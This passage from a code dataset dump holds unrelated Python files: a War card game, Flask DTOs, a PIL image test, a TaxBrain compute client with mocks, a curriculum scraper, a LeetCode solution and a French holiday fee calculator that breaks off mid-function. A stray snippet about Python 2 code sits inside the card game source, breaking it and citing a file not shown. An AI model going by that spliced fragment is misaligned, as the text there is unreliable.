rank.title()\r\n self.value = valuesdict[self.rank]\r\n \r\n def __str__(self):\r\n return self.rank + \" of \" + self.suit\r\nclass Deck:\r\n \r\n def __init__(self):\r\n \r\n self.all_cards = []\r\n \r\n for suit in suits:\r\n for rank 
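import_gome_data.py above targets Python 2 (urllib2, minidom). A rough Python 3 equivalent of its sitemap-index fetch, assuming the same <sitemapindex>/<sitemap>/<loc> XML shape; this is a sketch, not the project's actual code:

from urllib.request import urlopen
from xml.dom import minidom

def get_index(url):
    # Collect every <loc> nested under a <sitemap> element.
    with urlopen(url) as resp:
        if resp.status != 200:
            return []
        dom = minidom.parseString(resp.read())
    return [sm.getElementsByTagName('loc')[0].childNodes[0].nodeValue
            for sm in dom.documentElement.getElementsByTagName('sitemap')]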
in ranks:\r\n created_card = Card(suit, rank)\r\n self.all_cards.append(created_card)\r\n \r\n def shuffle(self):\r\n shuffle(self.all_cards)\r\n \r\n def deal_one(self):\r\n return self.all_cards.pop()\r\n\r\nclass Player:\r\n def __init__(self, name):\r\n self.name = name\r\n self.all_cards = []\r\n def remove_card(self):\r\n \r\n return self.all_cards.pop(0)\r\n \r\n def add_cards(self, new_cards):\r\n \r\n if type(new_cards) == type([]):\r\n self.all_cards.extend(new_cards)\r\n else:\r\n self.all_cards.append(new_cards)\r\n \r\n def __str__(self):\r\n return f' Player {self.name} has {len(self.all_cards)} cards.'\r\n\r\n#Game Logic\r\n\r\n# create two players\r\nplayer1 = Player('One')\r\nplayer2 = Player('Two')\r\n\r\n# Create new deck\r\nnew_deck = Deck()\r\n # shuffle\r\nnew_deck.shuffle()\r\n# split deck between each player\r\n\r\nfor x in range(26):\r\n player1.add_cards(new_deck.deal_one())\r\n player2.add_cards(new_deck.deal_one())\r\n\r\n# check to see if anybody has won/lost (0 cards)\r\n# while game_on is true\r\nround_num = 0\r\ngame_on = True\r\neachwar = 15\r\n\r\nwhile game_on:\r\n round_num += 1\r\n print(f'Round {round_num}')\r\n \r\n if len(player1.all_cards) == 0:\r\n print(\"Player 2 wins!\")\r\n game_on = False\r\n break\r\n if len(player2.all_cards) == 0:\r\n print(\"Player 1 wins!\")\r\n game_on = False\r\n break\r\n player_1_cards = []\r\n player_1_cards.append(player1.remove_card())\r\n player_2_cards = []\r\n player_2_cards.append(player2.remove_card())\r\n war = True\r\n while war:\r\n if player_1_cards[-1].value > player_2_cards[-1].value:\r\n player1.add_cards(player_1_cards) \r\n player1.add_cards(player_2_cards)\r\n war = False\r\n elif player_1_cards[-1].value < player_2_cards[-1].value:\r\n player2.add_cards(player_1_cards) \r\n player2.add_cards(player_2_cards)\r\n \r\n war = False\r\n else: \r\n print('WAR!')\r\n if len(player1.all_cards) < eachwar:\r\n print('Player One unable to declare war.')\r\n print('Player Two Wins!')\r\n game_on = False\r\n war = False\r\n elif len(player2.all_cards) < eachwar:\r\n print('Player Two unable to declare war.')\r\n print('Player One Wins!')\r\n game_on = False\r\n war = False\r\n else:\r\n for num in range(eachwar):\r\n player_1_cards.append(player1.remove_card())\r\n player_2_cards.append(player2.remove_card())\r\n","sub_path":"War.py","file_name":"War.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29190749","text":"from flask_restx import Namespace, fields\n\nclass RequestDto:\n api = Namespace(\"request\", path=\"/request\")\n\n no_pattern = \"([1-9]|1[012])-([1-9]|([1-9][0-9]))+\"\n # date_pattern = \"(\\d{4}-\\d{2}-\\d{2} ([2][0-3]|[0-1][0-9]|[1-9]):[0-5][0-9]:([0-5][0-9]|[6][0]))\"\n date_pattern = \"\\d{4}-\\d{2}-\\d{2}\"\n photo_fn_pattern = \"(.*/)*.+\\.(png|jpg|jpeg|PNG|JPG|JPEG)\"\n id_pattern = \"[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}\"\n\n request = api.model(\"request\", {\n \"id\": fields.String(),\n \"no\": fields.String(required=True, pattern=no_pattern),\n \"date\": fields.String(dt_format=\"rfc822\", required=True, pattern=date_pattern),\n \"detail\": fields.String(),\n \"result\": fields.Integer(required=True, min=0, max=2),\n \"rating\": fields.Integer(required=True, min=0, max=5),\n \"photo_fn\": fields.String(required=True, pattern=photo_fn_pattern),\n \"client\": fields.Nested(\n api.model(\"client\", {\n \"id\": fields.String(required=True, 
attribute=\"client_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"client_name\")\n }), required = True\n ),\n \"approach\": fields.Nested(\n api.model(\"approach\", {\n \"id\": fields.String(required=True, attribute=\"approach_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"approach_name\")\n }), required = True\n ),\n \"type\": fields.Nested(\n api.model(\"type\", {\n \"id\": fields.String(required=True, attribute=\"type_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"type_name\")\n }), required = True\n ),\n \"fixers\": fields.List(\n fields.Nested(\n api.model(\"fixer\", {\n \"id\": fields.String(required=True, attribute=\"fixer_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"fixer_name\")\n }), required = True\n ), min_items = 1\n )\n })\n\nclass OfficeDto:\n api = Namespace(\"office\", path=\"/office\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n office = api.model(\"office\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern),\n \"total_requests\": fields.Integer()\n })\n\nclass ModeDto:\n api = Namespace(\"mode\", path=\"/mode\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n mode = api.model(\"mode\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern)\n })\n\nclass NatureDto:\n api = Namespace(\"nature\", path=\"/nature\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n nature = api.model(\"nature\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern),\n \"total_requests\": fields.Integer()\n })\n\nclass TechnicianDto:\n api = Namespace(\"technician\", path=\"/technician\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n technician = api.model(\"technician\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern),\n \"total_requests\": fields.Integer()\n })","sub_path":"app/server/utils/_dtos.py","file_name":"_dtos.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285025214","text":"from PIL import Image\nimport sys\n\nimport numpy as np\n\n#b = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8]])\n#a = np.reshape(b,(3,3))\n#for i in a:\n# print (i)\n#print (a)\n\nimg = Image.new('RGB', (1920, 1080*2))\nimg1 = Image.open('photo/left.jpg')\nimg2 = Image.open('photo/right.jpg')\nimg.paste(img1, (0,1070))\nimg.paste(img2,(0,0))\n\n\nimg3 = img.crop((400,0, 1600, 1080*2))\n\n\n#img1 = Image.open(sys.argv[1])\nwidth, height = img1.size\nm = -0.5\nxshift = abs(m) * width\nnew_width = width + int(round(xshift))\nimg4 = img.transform((new_width, height), Image.AFFINE,\n (1, m, -xshift if m > 0 else 0, 0, 1, 0), Image.BICUBIC)\n#img.save(sys.argv[2]\n\nimg4.show()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49884822","text":"import os\nimport json\nimport requests\nimport msgpack\nfrom requests.exceptions import RequestException, Timeout\nimport requests_mock\nimport taxcalc\nfrom .helpers import arrange_totals_by_row\n\nrequests_mock.Mocker.TEST_PREFIX = 'dropq'\n\nNUM_BUDGET_YEARS = int(os.environ.get('NUM_BUDGET_YEARS', 10))\nNUM_BUDGET_YEARS_QUICK = int(os.environ.get('NUM_BUDGET_YEARS_QUICK', 1))\nWORKER_HN = os.environ.get('DROPQ_WORKERS')\nDROPQ_URL = \"/dropq_start_job\"\n# URL to perform the dropq 
algorithm on a sample of the full dataset\nDROPQ_SMALL_URL = \"/dropq_small_start_job\"\nTIMEOUT_IN_SECONDS = 1.0\nMAX_ATTEMPTS_SUBMIT_JOB = 20\nBYTES_HEADER = {'Content-Type': 'application/octet-stream'}\n\nAGG_ROW_NAMES = taxcalc.tbi_utils.AGGR_ROW_NAMES\nGDP_ELAST_ROW_NAMES = taxcalc.tbi.GDP_ELAST_ROW_NAMES\n\n\nclass JobFailError(Exception):\n '''An Exception to raise when a remote jobs has failed'''\n\n\nclass DropqCompute(object):\n num_budget_years = NUM_BUDGET_YEARS\n\n def remote_submit_job(\n self,\n theurl,\n data,\n timeout=TIMEOUT_IN_SECONDS,\n headers=None):\n print(theurl, data)\n if headers is not None:\n response = requests.post(theurl,\n data=data,\n timeout=timeout,\n headers=headers)\n else:\n response = requests.post(theurl, data=data, timeout=timeout)\n return response\n\n def remote_results_ready(self, theurl, params):\n job_response = requests.get(theurl, params=params)\n return job_response\n\n def remote_retrieve_results(self, theurl, params):\n job_response = requests.get(theurl, params=params)\n return job_response\n\n def submit_calculation(self, data):\n url_template = \"http://{hn}\" + DROPQ_URL\n return self.submit(data, url_template)\n\n def submit_quick_calculation(self, data):\n url_template = \"http://{hn}\" + DROPQ_SMALL_URL\n return self.submit(data, url_template,\n increment_counter=False)\n\n def submit_elastic_calculation(self, data):\n url_template = \"http://{hn}/elastic_gdp_start_job\"\n return self.submit(data, url_template)\n\n def submit(self,\n data_list,\n url_template,\n increment_counter=True,\n use_wnc_offset=True):\n\n print(\"hostnames: \", WORKER_HN)\n print(\"submitting data: \", data_list)\n job_ids = []\n queue_length = 0\n for data in data_list:\n submitted = False\n attempts = 0\n while not submitted:\n packed = msgpack.dumps({'inputs': data}, use_bin_type=True)\n theurl = url_template.format(hn=WORKER_HN)\n try:\n response = self.remote_submit_job(\n theurl, data=packed, timeout=TIMEOUT_IN_SECONDS,\n headers=BYTES_HEADER)\n if response.status_code == 200:\n print(\"submitted: \", )\n submitted = True\n response_d = response.json()\n job_ids.append(response_d['job_id'])\n queue_length = response_d['qlength']\n else:\n print(\"FAILED: \", data, WORKER_HN)\n attempts += 1\n except Timeout:\n print(\"Couldn't submit to: \", WORKER_HN)\n attempts += 1\n except RequestException as re:\n print(\"Something unexpected happened: \", re)\n attempts += 1\n if attempts > MAX_ATTEMPTS_SUBMIT_JOB:\n print(\"Exceeded max attempts. 
Bailing out.\")\n raise IOError()\n\n return job_ids, queue_length\n\n def results_ready(self, job_ids):\n jobs_done = []\n for job_id in job_ids:\n result_url = \"http://{hn}/dropq_query_result\".format(hn=WORKER_HN)\n job_response = self.remote_results_ready(\n result_url, params={'job_id': job_id})\n msg = '{0} failed on host: {1}'.format(job_id, WORKER_HN)\n if job_response.status_code == 200: # Valid response\n jobs_done.append(job_response.text)\n else:\n print(\n 'did not expect response with status_code',\n job_response.status_code)\n raise JobFailError(msg)\n return jobs_done\n\n def _get_results_base(self, job_ids, job_failure=False):\n ans = []\n for job_id in job_ids:\n result_url = \"http://{hn}/dropq_get_result\".format(hn=WORKER_HN)\n job_response = self.remote_retrieve_results(\n result_url,\n params={'job_id': job_id}\n )\n if job_response.status_code == 200: # Valid response\n try:\n if job_failure:\n ans.append(job_response.text)\n else:\n ans.append(job_response.json())\n except ValueError:\n # Got back a bad response. Get the text and re-raise\n msg = 'PROBLEM WITH RESPONSE. TEXT RECEIVED: {}'\n raise ValueError(msg)\n return ans\n\n def get_results(self, job_ids, job_failure=False):\n if job_failure:\n return self._get_results_base(job_ids, job_failure=job_failure)\n\n ans = self._get_results_base(job_ids, job_failure=job_failure)\n\n names = [\n \"dist2_xdec\",\n \"dist1_xdec\",\n \"diff_itax_xdec\",\n \"diff_ptax_xdec\",\n \"diff_comb_xdec\",\n \"dist2_xbin\",\n \"dist1_xbin\",\n \"diff_itax_xbin\",\n \"diff_itax_xbin\",\n \"diff_ptax_xbin\",\n \"diff_comb_xbin\",\n \"aggr_d\",\n \"aggr_1\",\n \"aggr_2\"]\n results = {name: {} for name in names}\n\n for result in ans:\n for name in results:\n results[name].update(result[name])\n\n results['aggr_d'] = arrange_totals_by_row(results['aggr_d'],\n AGG_ROW_NAMES)\n\n results['aggr_1'] = arrange_totals_by_row(results['aggr_1'],\n AGG_ROW_NAMES)\n\n results['aggr_2'] = arrange_totals_by_row(results['aggr_2'],\n AGG_ROW_NAMES)\n\n return results\n\n\nclass MockCompute(DropqCompute):\n\n num_budget_years = NUM_BUDGET_YEARS\n __slots__ = ('count', 'num_times_to_wait', 'last_posted')\n\n def __init__(self, num_times_to_wait=0):\n self.count = 0\n # Number of times to respond 'No' before\n # replying that a job is ready\n self.num_times_to_wait = num_times_to_wait\n\n def remote_submit_job(self, theurl, data, timeout, headers=None):\n with requests_mock.Mocker() as mock:\n resp = {'job_id': '424242', 'qlength': 2}\n resp = json.dumps(resp)\n mock.register_uri('POST', DROPQ_URL, text=resp)\n mock.register_uri('POST', DROPQ_SMALL_URL, text=resp)\n mock.register_uri('POST', '/elastic_gdp_start_job', text=resp)\n mock.register_uri('POST', '/btax_start_job', text=resp)\n self.last_posted = data\n return DropqCompute.remote_submit_job(self, theurl, data, timeout)\n\n def remote_results_ready(self, theurl, params):\n with requests_mock.Mocker() as mock:\n if self.num_times_to_wait > 0:\n mock.register_uri('GET', '/dropq_query_result', text='NO')\n self.num_times_to_wait -= 1\n else:\n mock.register_uri('GET', '/dropq_query_result', text='YES')\n return DropqCompute.remote_results_ready(self, theurl, params)\n\n def remote_retrieve_results(self, theurl, params):\n mock_path = os.path.join(os.path.split(__file__)[0], \"tests\",\n \"response_year_{0}.json\")\n with open(mock_path.format(self.count), 'r') as f:\n text = f.read()\n self.count += 1\n with requests_mock.Mocker() as mock:\n mock.register_uri('GET', '/dropq_get_result', 
text=text)\n return DropqCompute.remote_retrieve_results(self, theurl, params)\n\n def reset_count(self):\n \"\"\"\n reset worker node count\n \"\"\"\n self.count = 0\n\n\nclass ElasticMockCompute(MockCompute):\n\n def remote_retrieve_results(self, theurl, params):\n self.count += 1\n text = ('{\"elasticity_gdp\": {\"gdp_elasticity_1\": \"0.00310\"}, '\n '\"dropq_version\": \"0.6.a96303\", \"taxcalc_version\": '\n '\"0.6.10d462\"}')\n with requests_mock.Mocker() as mock:\n mock.register_uri('GET', '/dropq_get_result', text=text)\n return DropqCompute.remote_retrieve_results(self, theurl, params)\n\n\nclass MockFailedCompute(MockCompute):\n\n def remote_results_ready(self, theurl, params):\n print('MockFailedCompute remote_results_ready', theurl, params)\n with requests_mock.Mocker() as mock:\n mock.register_uri('GET', '/dropq_query_result', text='FAIL')\n return DropqCompute.remote_results_ready(self, theurl, params)\n\n\nclass MockFailedComputeOnOldHost(MockCompute):\n \"\"\"\n Simulate requesting results from a host IP that is no longer used. This\n action should raise a `ConnectionError`\n \"\"\"\n\n def remote_results_ready(self, theurl, params):\n print('MockFailedComputeOnOldHost remote_results_ready',\n theurl, params)\n raise requests.ConnectionError()\n\n\nclass NodeDownCompute(MockCompute):\n\n __slots__ = ('count', 'num_times_to_wait', 'switch')\n\n def __init__(self, **kwargs):\n if 'switch' in kwargs:\n self.switch = kwargs['switch']\n del kwargs['switch']\n else:\n self.switch = 0\n self.count = 0\n self.num_times_to_wait = 0\n super(MockCompute, self).__init__(**kwargs)\n\n def remote_submit_job(self, theurl, data, timeout, headers=None):\n with requests_mock.Mocker() as mock:\n resp = {'job_id': '424242', 'qlength': 2}\n resp = json.dumps(resp)\n if (self.switch % 2 == 0):\n mock.register_uri('POST', DROPQ_URL, status_code=502)\n mock.register_uri(\n 'POST',\n '/elastic_gdp_start_job',\n status_code=502)\n mock.register_uri('POST', '/btax_start_job', status_code=502)\n else:\n mock.register_uri('POST', DROPQ_URL, text=resp)\n mock.register_uri('POST', '/elastic_gdp_start_job', text=resp)\n mock.register_uri('POST', '/btax_start_job', text=resp)\n self.switch += 1\n self.last_posted = data\n return DropqCompute.remote_submit_job(self, theurl, data, timeout)\n","sub_path":"webapp/apps/taxbrain/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":11090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"489770443","text":"from flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask import json\nfrom bs4 import BeautifulSoup\nfrom sqlalchemy import create_engine\nfrom models import Lecture, Exercise, Timestamp, GitUser, GitRepo, LocalUser\nimport requests\nfrom config import ProductionConfig\nfrom datetime import datetime, time\nfrom data import parse_data\n\nfrom models import db\nfrom app import app\n\nmigrate = Migrate(app, db)\nmanager = Manager(app)\n\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef get_all_lectures():\n\n response = requests.get('http://curric.rithmschool.com/r13/lectures/')\n soup = BeautifulSoup(response.text)\n links = []\n\n # Drop current lecture table\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n Lecture.__table__.drop(engine)\n db.create_all()\n\n for link in soup.find_all('a'):\n links.append(link.get('href'))\n\n for link in links:\n if 'zip' in link:\n continue\n response = requests.get(\n 
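The Mock* classes above all lean on the same requests-mock context-manager pattern; a self-contained sketch of it, with a made-up worker host:

import requests
import requests_mock

with requests_mock.Mocker() as mock:
    mock.register_uri('POST', 'http://worker.test/dropq_start_job',
                      json={'job_id': '424242', 'qlength': 2})
    resp = requests.post('http://worker.test/dropq_start_job', data=b'payload')
    assert resp.json() == {'job_id': '424242', 'qlength': 2}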
'http://curric.rithmschool.com/r13/lectures/' + link)\n soup = BeautifulSoup(response.text)\n if (soup.title is None):\n continue\n if (soup.title.string == 'Rithm Curriculum'):\n continue\n else:\n new_lecture = Lecture(\n title=link,\n url='http://curric.rithmschool.com/r13/lectures/' + link)\n db.session.add(new_lecture)\n\n db.session.commit()\n\n\n@manager.command\ndef get_all_exercises():\n\n response = requests.get('http://curric.rithmschool.com/r13/exercises/')\n soup = BeautifulSoup(response.text)\n links = []\n\n # Drop Exercise table\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n Exercise.__table__.drop(engine)\n db.create_all()\n\n # Set up current exercises to test for duplicates\n current_exercises = []\n for exercise in Exercise.query.all():\n current_exercises.append(exercise.title)\n\n # Search soup for links\n for link in soup.find_all('a'):\n links.append(link.get('href'))\n\n for link in links:\n if 'zip' in link:\n continue\n\n response = requests.get(\n 'http://curric.rithmschool.com/r13/exercises/' + link)\n soup = BeautifulSoup(response.text)\n if (soup.title is None):\n continue\n if (soup.title.string == 'Rithm Curriculum'):\n continue\n else:\n new_exercise = Exercise(\n title=link,\n url='http://curric.rithmschool.com/r13/exercises/' + link)\n db.session.add(new_exercise)\n\n db.session.commit()\n\n\n@manager.command\ndef update_repos():\n current_time = datetime.now()\n new_time = (current_time.strftime(\"%c\"))\n\n # Drop tables\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n GitRepo.__table__.drop(engine)\n GitUser.__table__.drop(engine)\n\n db.create_all()\n\n # Update users\n users = LocalUser.query.all()\n timezone = {'Time-Zone': 'PST8PDT'}\n for user in users:\n username = user.localuser\n git_data = requests.get(\n f'https://api.github.com/users/{username}/events?per_page=100',\n params=timezone)\n content = git_data.content\n parsed_json = json.loads(content)\n parse_data(parsed_json)\n\n # Timestamp update\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n Timestamp.__table__.drop(engine)\n db.create_all()\n\n new_timestamp = Timestamp(time=new_time)\n\n db.session.add(new_timestamp)\n db.session.commit()\n\n\nif __name__ == '__main__':\n manager.run()\n\n # # Set up current exercises to test for duplicates\n # current_exercises = []\n # for exercise in Exercise.query.all():\n # current_exercises.append(exercise.title)\n\n # for link in soup.find_all('a'):\n # links.append('https://curric.rithmschool.com/r13/exercises/' +\n # link.get('href'))\n\n # for link in links:\n # if 'zip' in link:\n # continue\n # response = requests.get(link)\n # soup = BeautifulSoup(response.text)\n # if (soup.title is None):\n # continue\n # else:\n # if soup.title.string in current_exercises:\n # continue\n # else:\n # new_exercise = Exercise(title=soup.title.string, url=link)\n # db.session.add(new_exercise)","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606376477","text":"# encoding: utf-8\nfrom uuid import uuid4\nfrom datetime import datetime\nfrom test.json_utils import list_to_json\n\nclass BaseModel(object):\n \"\"\"Base class\"\"\"\n # 1:enabled 0:disabled\n status_ = ''\n created_time = ''\n creater =''\n modified_time = ''\n modifier = ''\n\n def __init__(self,status_ ,created_time,creater,modified_time,modifier):\n self.status_ =status_\n self.created_time = 
created_time\n self.creater = creater\n self.modified_time = modified_time\n self.modifier = modifier\n\nclass Comment(BaseModel):\n \"\"\"Represents Proected comments.\"\"\"\n\n id = ''\n name = ''\n text = ''\n date = ''\n\n def __init__(self,name,text,date,status_ ,created_time,creater,modified_time,modifier):\n super(Comment,self).__init__(status_ ,created_time,creater,modified_time,modifier)\n self.id =uuid4()\n self.name = name\n self.text = text\n self.date = date\n\n\ncomm1=Comment(name='zhangsan',\n text='1233frkfrfmrf',\n date=datetime.now(),\n status_='1',\n created_time=datetime.now(),\n creater ='null',\n modified_time=datetime.now(),\n modifier ='null')\n\ncomm2=Comment(name='test',\n text='6666666',\n date=datetime.now(),\n status_='0',\n created_time=datetime.now(),\n creater ='est',\n modified_time=datetime.now(),\n modifier ='tt')\nobjs=[]\nobjs.append(comm1)\nobjs.append(comm2)\n#print(dir(comm1))\nprint(list_to_json(objs))\n\n","sub_path":"test/test_to_json.py","file_name":"test_to_json.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"142488050","text":"# -*- coding:utf-8 -*-\n# Author: washing\n# DateTime: 2022/3/22 9:15\n# File: 2038.py\n# Desc: \n\nclass Solution:\n def winnerOfGame(self, colors: str) -> bool:\n dic = {'A': 0, 'B': 0}\n this = \"\"\n counter = 0\n colors += \"C\"\n for i in colors:\n if this == i: counter += 1\n else:\n if counter >= 3: dic[this] += counter-2\n counter = 1\n this = i\n return dic['A'] > dic['B']\n","sub_path":"Solutions/2038/2038.py","file_name":"2038.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"580514349","text":"import pandas as pd\nfrom pandas.tseries.holiday import *\nfrom pandas.tseries.offsets import CustomBusinessDay\n\nclass FrenchBusinessCalendar(AbstractHolidayCalendar):\n rules = [\n Holiday('New Years Day', month=1, day=1),\n EasterMonday,\n Holiday('Labour Day', month=5, day=1),\n Holiday('Victory in Europe Day', month=5, day=8),\n Holiday('Ascension Day', month=1, day=1, offset=[Easter(), Day(39)]),\n Holiday('Bastille Day', month=7, day=14),\n Holiday('Assumption of Mary to Heaven', month=8, day=15),\n Holiday('All Saints Day', month=11, day=1),\n Holiday('Armistice Day', month=11, day=11),\n Holiday('Christmas Day', month=12, day=25)\n ]\n\nFrench_BD = CustomBusinessDay(calendar=FrenchBusinessCalendar())\ns = pd.date_range('2016-12-29', end='2021-01-03', freq=French_BD)\ndf = pd.DataFrame(s, columns=['Date'])\n\n# Define fares depending on day time\nnormal_dict = {'day_first_hour_fare':'42',\n 'night_first_hour_fare':'49.50',\n 'day_subsequent_hour_fare': '30',\n 'night_subsequent_hour_fare': '37.50'\n }\n\nholiday_dict = {'day_first_hour_fare':'49.50',\n 'night_first_hour_fare':'57',\n 'day_subsequent_hour_fare':'37.50',\n 'night_subsequent_hour_fare':'45'\n\n}\n\n\ndef calculate_honorary(start_date, end_date, normal_dict, holiday_dict):\n \"\"\"\n Calculate the honorary for worked hours based on following rules\n\n params: start_date (str), start date in format '%Y-%m-%d-H:M:S'\n params: end_date (str), end date in format '%Y-%m-%d-H:M:S'\n params: normal_dict (dict), business day fare dictionnary\n params: holiday_dict (dict), holiday day fare dictionnary\n\n #### Payment Rules\n\n day is between 0700 and 2200\n night is between 2200 and 0700\n\n normal day fare:\n * first hour = 42 euros\n * subsequent hour = 30 
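A small check of the calendar defined at the top of this record: a CustomBusinessDay frequency skips weekends plus the listed French holidays, so Bastille Day drops out of any date_range built with it. Sketch, assuming the FrenchBusinessCalendar class above:

import pandas as pd
from pandas.tseries.offsets import CustomBusinessDay

French_BD = CustomBusinessDay(calendar=FrenchBusinessCalendar())
july = pd.date_range('2020-07-13', '2020-07-15', freq=French_BD)  # Mon-Wed window
assert pd.Timestamp('2020-07-14') not in july  # Bastille Day is skipped
assert pd.Timestamp('2020-07-15') in july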
euros\n\n    normal night fare:\n    * first hour = 49.50 euros\n    * subsequent hour = 37.50 euros\n\n    holiday day fare:\n    * first hour = 49.50 euros\n    * subsequent hour = 37.50 euros\n\n    holiday night fare:\n    * first hour = 57 euros\n    * subsequent hour = 45 euros\n    \"\"\"\n\n    # Transform dates to Timestamps\n    start_date = pd.Timestamp(start_date)\n    end_date = pd.Timestamp(end_date)\n\n    print('Start date: ' + str(start_date))\n    print('End date: ' + str(end_date))\n    print(' ')\n    # Get number of hours worked\n    number_hours_worked = int(pd.Timedelta(end_date - start_date, unit='h') / timedelta(hours=1))\n    if number_hours_worked < 0:\n        raise ValueError(\"End date happened before start date\")\n    else:\n        main_mess = 'You have worked ' + str(number_hours_worked) + ' hours.'\n        print(main_mess)\n\n    # Get actual hours relative to the day\n    worked_hours = pd.Series(pd.date_range(start_date, end_date, freq='H').hour)\n    worked_dates = pd.Series(pd.date_range(start_date, end_date, freq='H').date)\n\n    # Get whether these hours were day or night shift\n    ## Day is defined between 0700 and 2200\n    bins = [0, 7, 22, 24]\n    # A third night label is added here and folded back into 'Night' below. Suboptimal\n    labels = ['Night', 'Day', 'Night1']\n    # Compute shifts\n    shift = pd.cut(worked_hours[1:], bins=bins, labels=labels, include_lowest=True, right=True).replace('Night1', 'Night')\n    # Concatenate data\n    hours_per_shift = (pd\n                       .DataFrame(pd.concat([worked_dates, worked_hours, shift], axis=1))\n                       .rename(columns={0: 'date', 1: 'hour', 2: 'shifts'}))\n    # Shift the shifts column to get the correct number of hours per shift per day\n    hours_per_shift.shifts = hours_per_shift.shifts.shift(-1)\n    # Group by and count the number of hours\n    # Fill NaN with 0 hours worked\n    hours_per_shift = hours_per_shift.groupby(['date', 'shifts']).count().fillna(0)\n    print(hours_per_shift)\n    print(' ')\n    # Verify whether start date is a holiday\n    if (df.Date.astype(str).str.contains(start_date.strftime('%Y-%m-%d')).sum()) > 0:\n        # Day in calendar, so not holiday\n        start_holiday = False\n        fare_dict_start = normal_dict\n        start_date_mess = 'Start date is business day.'\n        print(start_date_mess)\n    else:\n        # Day not in calendar, so holiday\n        start_holiday = True\n        fare_dict_start = holiday_dict\n        start_date_mess = 'Start date is weekend or holiday.'\n        print(start_date_mess)\n    if df.Date.astype(str).str.contains(end_date.strftime('%Y-%m-%d')).sum() > 0:\n        # Day in calendar, so not holiday\n        end_holiday = False\n        fare_dict_end = normal_dict\n        end_date_mess = 'End date is business day.'\n        print(end_date_mess)\n    else:\n        # Day not in calendar, so holiday\n        end_holiday = True\n        fare_dict_end = holiday_dict\n        end_date_mess = 'End date is weekend or holiday.'\n        print(end_date_mess)\n\n    # Calculate fee\n\n    print('')\n\n    if start_date.date() == end_date.date():  # if mission was on one day only\n        print('Mission was on one single day')\n        # Set end date as no gain\n        honorary_end_date = 0\n        # Get first day data\n        day_one = hours_per_shift.reset_index().loc[hours_per_shift.reset_index()['date'] == start_date]\n        if shift.iloc[0] == 'Day':\n            honorary_start_date = (float(fare_dict_start.get(\"day_first_hour_fare\"))\n                                   + float((day_one.loc[day_one.shifts == 'Day'].hour - 1)\n                                   * float(fare_dict_start.get(\"day_subsequent_hour_fare\")))\n                                   + float((day_one.loc[day_one.shifts == 'Night'].hour)\n                                   * float(fare_dict_start.get(\"night_subsequent_hour_fare\"))))\n        else:\n            honorary_start_date = (float(fare_dict_start.get(\"night_first_hour_fare\"))\n                                   + float((day_one.loc[day_one.shifts == 'Night'].hour - 1)\n                                   * 
float(fare_dict_start.get(\"night_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Day'].hour)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\"))))\n\n else: # if mission was on two consecutive days\n print('Mission was on two consecutive days')\n print('')\n day_one = hours_per_shift.reset_index().loc[hours_per_shift.reset_index()['date'] == start_date]\n day_two = hours_per_shift.reset_index().loc[hours_per_shift.reset_index()['date'] == end_date]\n if shift.iloc[0] == 'Day':\n print('First hour is day shift')\n # Honorary Start Date\n honorary_start_date = (float(fare_dict_start.get(\"day_first_hour_fare\"))\n + float((day_one.loc[day_one.shifts == 'Day'].hour - 1)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Night'].hour)\n * float(fare_dict_start.get(\"night_subsequent_hour_fare\"))))\n # Honorary End Date\n honorary_end_date = (\n + float((day_two.loc[day_two.shifts == 'Night'].hour)\n * float(fare_dict_end.get(\"night_subsequent_hour_fare\")))\n + float((day_two.loc[day_two.shifts == 'Day'].hour)\n * float(fare_dict_end.get(\"day_subsequent_hour_fare\"))))\n else:\n print('First hour isnight shift')\n # Honorary Start Date\n honorary_start_date = (float(fare_dict_start.get(\"night_first_hour_fare\"))\n + float((day_one.loc[day_one.shifts == 'Night'].hour - 1)\n * float(fare_dict_start.get(\"night_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Day'].hour)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\"))))\n # Honorary End Date\n 